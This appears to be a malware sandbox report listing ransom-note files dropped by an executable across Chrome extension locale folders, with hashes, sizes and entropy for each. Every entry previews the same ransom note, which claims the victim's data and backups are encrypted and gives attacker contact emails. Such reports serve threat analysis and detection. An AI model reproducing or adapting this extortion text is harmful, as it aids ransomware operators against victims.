                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ar\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\bg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ca\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\cs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\da\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\de\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\el\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\en\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\es\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fil\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\he\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\id\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\it\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ja\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ko\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lt\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
